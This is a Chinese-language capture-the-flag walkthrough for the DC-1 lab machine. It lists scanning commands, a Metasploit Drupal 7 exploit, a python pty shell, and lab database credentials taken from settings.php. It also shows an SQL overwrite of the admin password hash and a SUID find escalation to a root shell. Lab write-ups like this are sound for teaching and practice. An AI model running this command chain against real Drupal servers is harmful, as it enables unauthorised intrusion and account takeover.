DC-1靶场实验演示
步骤一、打虚拟机,打开DC-1和kill,之后直接输入arp-scan -l来查看网段内的所有主机,以此可以得到DC-1,的IP地址为:192.168.132.130
步骤二、寻找靶场的真实IP,用:
nmap -sP 1xx.xxx.xxx.xxx/24
-sP:扫描目标存活主机主机
步骤三、信息收集:探测端口以及服务
使用nmap对DC-1进行扫描
nmap -A -P- -v 192.168.132.130
-A:综合性扫描
-p-:代表的是指扫描全部端口
-v:冗余信息(他能给出扫描过程中的详细信息)
步骤四:访问wed站点
步骤五:发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
searchsploit drupal 7
步骤六:利用MSF进行渗透
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
我们先进入MSF控制台搜索drupal模块,然后再进入MSF去控制台msfdb run,再去搜索drupal模块search drupal进行扫描
Search Drupal
步骤七:选择相应的模块,进行测试
use 1
步骤八:设置靶场IP运行msf
set rhosts 192.168.132.130
run
步骤九:开始执行whoami命令,输入shell,
发现www-data权限
步骤十:直接进入home目录,发现flag4.txt文件,这时提示:需要提升权限
步骤十一:这时使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
这样就显示了当前路径
步骤十二:发现flag1文件
cd /var/www
Ls
cat flag1.txt
查看www目录下文件,发现flag1.txt文件,打开之后发现提示信息,在内容提示寻找站点的配置文
件
步骤十三:发现flag2,Drupal的默认配置文件为cat/var/www/sites/default/settings.php :查看文件内容cat/var/www/sites/default/settings.php:发现了flag2和数据库的账号密码,flag2提示,需提升权限为root来查看敏感文件
我们先进入数据库查看:
'username' => 'dbuser',
'password' => 'R0ck3t',
mysql -u dbuser -p
查看数据库,切换到drupaldb数据库,
show databases;
use drupaldb
show tables;
步骤十四:查找默认的Drupal user 表
select * from users;
发现admin信息
解决方法:置换drupal密码
步骤十五:进入www目录
quit;
php scripts/password-hash.sh 新密码
然后在进入数据库中把密码字段进行替换
进入mysql,输入密码,切换到drupaldb数据库
mysql -u dbuser -pR0ck3t
use drupaldb
将pass字段进行替换
update users set pass="$S$DP1Ap9LH4p/fiYkxkQsYJfj/rc7pmEzd17IAimm0pDYMcpVTT2tw" where name="admin";
步骤十六:登录站点
访问站点, 进行登录,密码是之前我们自己替换的,账号是admin
账号:admin
密码:123 成功登录
步骤十七:使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null,发现find命令
使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
步骤十八:发现最后的flag文件
我们切换语句进入shell,输入whoami查看当前权限,输入ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。
find ./ -name 666 -exec "/bin/sh" \;
whoami
ls
cd /root
Ls 查看cat thefinalflag.txt,文件cat thefinalflag.txt